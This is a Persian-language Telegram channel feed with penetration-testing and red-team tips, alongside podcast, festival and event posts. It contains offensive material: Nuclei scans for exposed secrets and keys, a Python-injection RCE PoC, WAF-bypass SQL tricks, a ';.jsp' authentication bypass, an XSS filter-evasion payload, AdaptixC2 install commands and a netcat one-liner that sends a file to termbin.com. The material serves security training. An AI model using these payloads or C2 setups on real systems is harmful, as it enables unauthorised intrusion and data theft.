Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
🔖 پیدا کردن Low Hanging Fruits با استفاده از Nuclei AI
nuclei -list targets.txt -ai 

💢 پیدا کردن فایل‌ های مدل AI/ML در معرض دید (.pkl, .h5, .pt) که ممکن است الگوریتم‌های اختصاصی یا داده‌ های آموزشی حساس را لو دهند.
nuclei -list targets.txt -ai

💢 پیدا کردن اسکریپت‌ های اتوماسیون در معرض دید (.sh, .ps1, .bat) که ابزارهای داخلی یا اعتبارنامه‌ ها را افشا می‌ کنند.
nuclei -list targets.txt -ai 

💢 شناسایی هدرهای CSP نادرست پیکربندی‌ شده که 'unsafe-inline' یا سورس‌ های وایلدکارت را اجازه می‌دهند.
nuclei -list targets.txt -ai 

💢 تشخیص صفحاتی که توکن‌ های JWT را در URL یا کوکی‌ها لو میدهند.
nuclei -list targets.txt -ai 

💢 شناسایی پیام‌های خطای بیش از حد پرجزئیات که جزئیات فریم‌ ورک یا کتابخانه را افشا می‌کنند.
nuclei -list targets.txt -ai 

💢 پیدا کردن endpointهای برنامه که stack trace یا کد منبع را در معرض دید قرار می‌ دهند.
nuclei -list targets.txt -ai 

💢 پیدا کردن اطلاعات حساس در کامنت‌های HTML (یادداشت‌های دیباگ، کلیدهای API، اعتبارنامه‌ها).
nuclei -list targets.txt -ai 

💢 پیدا کردن فایل‌های .env در معرض دید که اعتبارنامه‌ها، کلیدهای API و پسوردهای دیتابیس را لو می‌دهند.
nuclei -list targets.txt -ai 

💢 پیدا کردن فایل‌های پیکربندی در معرض دید مانند config.json, config.yaml, config.php, application.properties حاوی کلیدهای API و اعتبارنامه‌های دیتابیس.
nuclei -list targets.txt -ai 

💢 پیدا کردن فایل‌های پیکربندی حاوی اطلاعات حساس مانند اعتبارنامه‌ها، کلیدهای API، پسوردهای دیتابیس و سکرت‌های سرویس ابری.
nuclei -list targets.txt -ai 

💢 پیدا کردن فایل‌های پیکربندی دیتابیس مانند database.yml, db_config.php, .pgpass, .my.cnf که اعتبارنامه‌ها را لو می‌دهند.
nuclei -list targets.txt -ai 

💢 پیدا کردن فایل‌ های پیکربندی Docker و Kubernetes در معرض دید مانند docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json حاوی اعتبارنامه‌های ابری و سکرت‌ها.
nuclei -list targets.txt -ai 

💢 پیدا کردن کلیدهای SSH و فایل‌های پیکربندی در معرض دید مانند id_rsa, authorized_keys و ssh_config.

nuclei -list targets.txt -ai
💢 پیدا کردن فایل‌های پیکربندی WordPress در معرض دید (wp-config.php) حاوی اعتبارنامه‌های دیتابیس و سکرت‌های احراز هویت

nuclei -list targets.txt -ai
شناسایی فایل‌های .npmrc و .yarnrc در معرض دید که توکن‌های احراز هویت NPM را لو می‌دهند
nuclei -list targets.txt -ai "شناسایی لیست دایرکتوری‌های باز که فایل‌های حساس را در معرض دید قرار می‌دهند"
nuclei -list targets.txt -ai "پیدا کردن دایرکتوری‌های .git در معرض دید که اجازه دانلود کامل ریپو را می‌دهند"
nuclei -list targets.txt -ai "پیدا کردن ریپوزیتوری‌های .svn و .hg در معرض دید که کد منبع را لو می‌دهند"
nuclei -list targets.txt -ai "شناسایی سرورهای FTP باز که دسترسی ناشناس را اجازه می‌دهند"
nuclei -list targets.txt -ai "پیدا کردن endpointهای GraphQL با introspection فعال"
nuclei -list targets.txt -ai "شناسایی دایرکتوری‌های .well-known در معرض دید که داده‌های حساس را افشا می‌کنند"
nuclei -list targets.txt -ai "پیدا کردن صفحات phpinfo() عمومی که جزئیات محیط را لو می‌دهند"
nuclei -list targets.txt -ai "پیدا کردن داکیومنت‌های Swagger, Redocly, GraphiQL و API Blueprint در معرض دید"
nuclei -list targets.txt -ai "شناسایی دایرکتوری‌های .vscode و .idea در معرض دید که پیکربندی‌های توسعه‌دهنده را لو می‌دهند"
nuclei -list targets.txt -ai "تشخیص آدرس‌های IP داخلی (10.x.x.x, 192.168.x.x و غیره) در پاسخ‌های HTTP"
nuclei -list targets.txt -ai "پیدا کردن فایل‌های debug.log وردپرس در معرض دید که اعتبارنامه‌ها و پیام‌های خطا را لو می‌دهند"

nuclei -list targets.txt -ai 

💢 تشخیص CORS پیکربندی که originهای وایلدکارت ('*') را اجازه می‌دهد.

nuclei -list targets.txt -ai

💢 پیدا کردن فایل‌ های بک‌آپ و لاگ عمومی (.log, .bak, .sql, .zip, .dump).
nuclei -list targets.txt -ai

💢 پیدا کردن پنل‌ های ادمین در معرض دید با اعتبارنامه‌های پیش‌ فرض.
nuclei -list targets.txt -ai

💢 شناسایی endpointهای API رایج که داده‌های حساس کاربر را برمی‌ گردانند و وضعیت HTTP 200 OK می‌ دهند.
nuclei -list targets.txt -ai

💢 تشخیص برنامه‌های وب که در حالت دیباگ اجرا میشوند و ممکن است اطلاعات حساس سیستم را در معرض دید قرار دهند.
@TryHackBox
🤔53❤‍🔥2
RCE از طریق تزریق کد پایتون:

PoC:
{
  "name": "TryHackBox ",
  "args": {},
  "json_schema": {"type": "object", "properties": {}},
  "source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}

شما واقعاً از خوندن متودولوژی‌ ها لذت می‌برید؟


اگر بیشتر می‌خواید، توی کامنت‌ها نظرتون رو بگید چه تکنیک‌هایی کار کردید...


@TryHackBox
#پایتون #rce
👍11
🎙 قسمت دوم RadioZeroPod منتشر شد!

💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد.

از تولد یک کودک تا مرگ یک قهرمان!

🎧 این قسمت رو از اینجا ببینید:

https://youtu.be/F7raVUzP3LY

#RadioZeroPod
🔥6
⚡️ قدیمی اما مفید: چند ترفند MySQL برای شکستن بعضی #WAFها
SELECT -1e1 FROM test
SELECT ~1. FROM test
SELECT \N FROM test
SELECT @^1. FROM test
SELECT -id-1. FROM test

@TryHackBox
#باگ_بانتی #نکته #امنیت_سایبری
🔥10
《جشن آذرگان خجسته باد》

«روز آذر از ماه آذر در گاهشمار زرتشتی، برابر با سوم آذرماه در گاهشمار جلالی، جشن آذرگان است. ایرانیان باستان این روز را به برافروختن آتش و جشن و پایکوبی سپری می‌کردند، به آتشکده‌ها می‌رفتند و اهورامزدا را ستایش می‌کردند.»

«از میان چهار عنصر آتش، آب، خاک و باد، جایگاه آتش برای ایرانیان، ممتاز بود، زیرا با نور و راستی اهورایی پیوند داشت. ایرانیان با اتکا به همین باور دیرین، هزاران سال جشن‌های آذرگان و سده را که حول محور آتش معنا می‌شوند، برگزار می‌کردند و بر این باور استوار بودند که وقتی می‌گویند «چراغ خانه‌ات خاموش مباد» در واقع آرزو می‌کنند پیوند فرد با نور ایزدی گسسته نشود.»

«متون تاریخی و آیینی ایران نشان می‌دهد که برخلاف آنچه برخی ادعا می‌کنند، ایرانیان باستان هرگز آتش‌پرست نبودند، بلکه به باور آنان در واقع این آتش بود که آنها را به نور ایزدی پیوند می‌داد، روشنایی و گرما به جهان می‌بخشید، مظهر روشنایی در برابر تاریکی بود، حقیقت را آشکار و انسان را به بینش و خرد اهورایی نزدیک‌تر می‌کرد و هرگونه ناپاکی را می‌زدود.»
16🔥2👎1🤔1
Forwarded from P.F.K Security
AdaptixC2 v0.10
رلیز جدید بهترین open-source C2 منتشر شد
https://adaptix-framework.gitbook.io/adaptix-framework/blogs

UPD 0.10:
تغییرات

قابلیت ها :
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal


💻 مخزن
💻 کیت افزونه
📔 مستندات


#adaptixc2 #redteam #ردتیم
@PfkSecurity
2
Forwarded from P.F.K Security
نصب/اجرای :

sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient

@PfkSecurity
🔖 روش دور زدن احراز هویت:

💢 مراحل:
Target..com/carbon/server-admin/memory_info.jsp =
ریدایرکت به صفحه لاگین [وضعیت ۳۰۱]

```
Target..com/carbon/server-admin/memory_info.jsp;.jsp =
محتوای صفحه رو بدون احراز هویت برمیگردونه [وضعیت ۲۰۰]
`
پیلود > ;.jsp
نکته:
مسیرهای حساس رو از فایل‌های JS پیدا کن که نیاز به لاگین دارن.
endpointهایی رو پیدا کن که با اکستنشن تموم می‌شن مثل: .php, .jsp, .shtml و غیره.
هر endpoint رو با پیلود همون اکستنشن فاز کن: ;.jsp ;.php ;.shtml
اگر هر کدوم ۲۰۰ داد، دستی چک کن. ممکنه کار کنه!

لایک و اشتراک گذاشتن فراموش نشه

@TryHackBox
6👍1
🔖 روش جالب دور زدن sanitization ورودی برای XSS.

شما هم متوجه شدید که بیشتر سایت‌ها الان sanitization ورودی رو با بلاک کردن تگ‌ها و ایونت‌های خاص انجام می‌دن، درسته!? نه واقعاً 😅

خب، اول یه نگاهی به چند تگ نمونه که می‌تونن XSS رو فعال کنن بنداز:
noscript, img, a, iframe, object, video, audio, form, meta

سایت این کلمات کلیدی رو اگر داخل تگ‌هایی مثل < > یا </ > باشن بلاک میکنه و با هیچی (null یا رشته خالی "") جایگزین میکنه.

پس اگر پیلود زیر رو امتحان کنی:
<noscript>alert(1)</noscript>

تبدیل می‌شه به:
alert(1)

حالا یه کم عمیق‌تر فکر کن چی میشه اگر پیلود رو اینجوری بنویسی:
<noscript <img>> alert(1) </noscript </img>>

در این پیلود، به بخش اول دقت کن:
<noscript <img>>

اینجا <img> یه تگ کامل ایمِیجه و قطعاً توسط فیلتر sanitization حذف میشه. اما <noscript< چی؟
می‌بینی که تگ <noscript> هنوز درست نوشته نشده یعنی <noscript دنبال شده با <، پس دقیقاً با منطق sanitization مچ نمیشه.

حالا بخش جالب: وقتی <img> از <noscript <img>> حذف بشه، چی میمونه؟ <noscript>!

یعنی تبدیل به این صورت می‌شه:
<noscript <img>> → remove <img> → <noscript>
</noscript </img>> → remove </img> → </noscript>

و در نهایت پیلود معتبر میشه:
<noscript>alert(1)</noscript>

@TryHackBox
#xss
15👍10
درود دوستان عزیز،
امروز خوشحال میشم به شما معرفی کنم که من صفحه لینکدین مجموعه TryHackBox رو مجددا در لینکدین ایجاد کردم که فعالیت آموزشی در زمینه تست نفوذ و ردتیم را داریم. این مجموعه برای همه ی کسانی هست که به تست نفوذ و ردتیم علاقه دارن و می خوان از آموزش ها، راهکارها و تجربیات در این زمینه با هم به اشتراک بذارن.
امیدوارم که با همکاری شما، این مجموعه به یه جایی تبدیل بشه که همهی علاقهمندان به امنیت سایبری بتونن ازش استفاده کنن و اطلاعات مفیدی رو ازش بدست بیارن. لطفاً اگه علاقه مندید، به این مجموعه بپیوندید و دنبالش کنید تا از آموزش های ما بهره لازم ببرید
لینک مجموعه: https://lnkd.in/dBFp6QJK
ممنون از حضور شما و همراهی شما عزیزان .
از دوستان علاقه مندان به تولید محتوا و تدریس هم دعوت به همکاری مینماییم در صورت همکاری با مجموعه ما با ما در ارتباط باشید .
@THBxSupport
👍71
هکر مورد علاقه شما کیست؟ 👀
👎52
This media is not supported in your browser
VIEW IN TELEGRAM
🚨 از VPS برای بانتی یا کارهای سایبرسیکوریتی استفاده میکنی؟
خسته شدی از دردسر انتقال فایل‌های کوچیک؟

این جواهر مطلق رو امتحان کن 🔥
cat filename.txt | nc termbin.com 9999

بوم! لینک می‌گیری مثل https://termbin.com/abcd شر کن، سیو کن، یا برای بعدا نگه دار. بدون لاگین، بدون setup. فقط جادوی ترمینال خالص.

عالی برای نوت‌ها، PoCها، یا اسکریپت‌ها وقتی روی VPS ریموت کار می‌کنی.

@TryHackBox
#بانتی #سایبرسیکوریتی #نکته_لینوکس #وی_پی_اس #اینفوسک #هکینگ #باگ_بانتی
6👍4❤‍🔥1
🔵 بررسی مفهوم سیستم EDR
در این ویدیوی کوتاه و فشرده، سیستم EDR (Endpoint Detection and Response) را به زبان ساده بررسی می‌کنیم. 🎯

🔗 youtube:
https://youtu.be/GFdoQqy2-jQ


@TryHackBox

#EDR #امنیت_سایبری #آموزش_فارسی #EndpointSecurity #سایبری #امنیت_اطلاعات
🔥7
EDR.pdf
257.2 KB
فایل ارائه آموزشی مفهوم سیستم EDR

✍️نویسنده
@TryHackBox | The Chaos
2
شکار باگ‌ های Business Logic؟ این Flow رو امتحان کن:
⚡️ فلو اکسپلویت:

با یه username جدید ثبت‌نام کن
حساب رو فعال کن
حساب رو حذف کن
سعی کن با همون username حساب جدیدی بسازی

اگر جلوت رو گرفت این یه نقص Business Logicه!
💡 یوزرنیم های حساب‌ های حذف‌ شده نباید رزرو بمونن مگر اینکه دلیل معتبر تجاری/امنیتی وجود داشته باشه.

@TryHackBox
👍13
Forwarded from P.F.K Security
🔖 ۱۰ فریمورک برتر C2 که هر رد تیمری باید بشناسد 
هنر کنترل و فرماندهی را با دقت و استتار بیاموزید.

Mythic 
یک C2 مدرن و extensible نوشته شده با Python و Go. دارای رابط وب، agentهای چندزبانه و ویژگی‌های امنیت عملیاتی داخلی(opsec). مناسب تیم‌ های حرفه‌ای.

Cobalt Strike 
یک C2 تجاری که به طور گسترده در عملیات‌های رد تیم واقعی استفاده می‌شود. payload Beacon از پروفایل‌ های قابل تغییر و روش‌های pivot متنوع پشتیبانی می‌کند.

Sliver 
یک C2 متن‌باز و چندمنظوره توسط Bishop Fox. از implantهای Golang، ارتباطات رمزنگاری شده و رابط کاربری CLI/GUI ساده پشتیبانی می‌کند.

Havoc 
یک C2 پیشرفته post-exploitation نوشته شده با C++، ایده‌آل برای تحقیقات دور زدن EDR. تکنیک‌های امنیت عملیاتی(opsec) و طراحی implantهای مدرن ارائه می‌دهد.

Brute Ratel 
یک C2 متمرکز بر استتار و آگاه از EDR با امضاهای low detection signatures و گزینه‌های payload سفارشی.

Covenant 
فریم‌ورک C2 مبتنی بر.NET از Threat Intelligence مایکروسافت. قدرتمند برای engagements مبتنی بر Active Directory و یادگیری payloadهای مدرن C#.

Empire 
یک agent modular مبتنی بر PowerShell و Python برای post-exploitation. عالی برای pivot در شبکه داخلی و شبیه‌سازی tradecraft پایه.

Quasar RAT 
یک RAT سبک و راحت easy-to-customize به زبان C# برای ویندوز. رایج در engagements استتار شده یا توسعه ابزارهای سفارشی.

FudgeC2 
یک C2 مبتنی بر Python با پشتیبانی از HTTPS و payloadهای گسترده ویندوزی. طراحی‌ شده برای سادگی و استتار در شبکه‌های محدود.

Koadic (Zombie C2) 
یک C2 مبتنی بر JavaScript با استفاده از Windows Script Host (WSH). مفید برای عملیات‌های living-off-the-land و حملات fileless.

🧩 نکته : 
ابزار اپراتور را نمی‌ سازد. internals را یاد بگیرید، implantهای خود را بنویسید، و payloadهای خود را برای هر محیط سفارشی کنید.
@pfksecurity
6🔥5👍1
📌 برگزاری جلسه ویس چت :  مهندس سجاد تیموری، از اساتید تراز اول امنیت سایبری ایران

با سلام خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص واقعیت ‌های محیط کاری امنیت سایبری از جذابیت تا سختی ‌هایی که این محیط دارد به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
مهندس سجاد تیموری

📅 زمان برگزاری: دوشنبه 1404/09/17
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖  لینک جلسه :
⁉️ موضوعات ما :

💠 توقعات اشتباه درباره پنتست
💠 استرس ددلاین ‌ها
💬 سوالات خود را درباره واقعیت‌های محیط کاری امنیت سایبری از جذابیت تا سختی ‌هایی که این محیط دارد در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود.

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .


🆔 @RadioZeroPod
🆔 @TryHackBox
7